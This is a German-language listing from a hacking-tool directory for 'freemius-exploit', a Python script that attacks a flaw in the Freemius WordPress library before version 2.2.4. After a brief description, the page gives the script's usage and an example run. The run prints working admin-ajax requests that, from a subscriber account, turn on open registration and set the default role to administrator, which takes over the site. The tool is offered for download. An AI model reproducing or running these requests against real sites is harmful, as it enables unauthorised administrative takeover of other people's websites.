Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
freemius-exploit — Freemius Library < 2.2.4 - Subscriber+ Beliebiges Update von Optionen | Kitploit
Tools/GitHubGitHub/randomrobbiebf/freemius-exploit
Authentifizierung & AutorisierungPrivilege EscalationExploitationWebanwendungs-ExploitationPost-ExploitationPenetrationstests
GitHubrandomrobbiebf/freemius-exploit

freemius-exploit

Freemius Library < 2.2.4 - Subscriber+ Beliebiges Update von Optionen

Repository anzeigen
1vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

freemius-exploit

Freemius-Bibliothek < 2.2.4 - Beliebiges Options-Update ab Subscriber+

Beschreibung

Die Bibliothek, die in zahlreichen Plugins verwendet wird, besitzt beim Aktualisieren von Blog-Optionen keine ordnungsgemäße Autorisierung, wodurch jeder authentifizierte Benutzer, beispielsweise ein Abonnent, beliebige Optionen aktualisieren kann.

Verwendung

root@kitploit:~
usage: exploit.py [-h] -u URL [-un USERNAME] [-p PASSWORD] [-f FIX]

Freemius Library < 2.2.4 - Subscriber+ Arbitrary Option Update Description: The library, used in numerous plugins, does not have proper authorization when updating blog
options, allowing any authenticated users, such as a subscriber, to update arbitrary options.

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Website URL
  -un USERNAME, --username USERNAME
                        WordPress username
  -p PASSWORD, --password PASSWORD
                        WordPress password
  -f FIX, --fix FIX     Reset after Exploit

Beispiel

root@kitploit:~
$ python3 exploit.py -u http://wordpress.lan -un user -p useruser1
Plugin: wp-affiliate-disclosure   Version: 1.1.4   Not found.
Info: Using plugin 404-to-301 running version 3.0.1
Vulnerability check: http://wordpress.lan
Logged in successfully.
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=users_can_register&option_value=1
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=default_role&option_value=administrator
You can now register a user as an admin user. Remember to run --fix yes after you have registered to prevent others exploiting the site.
Tool herunterladen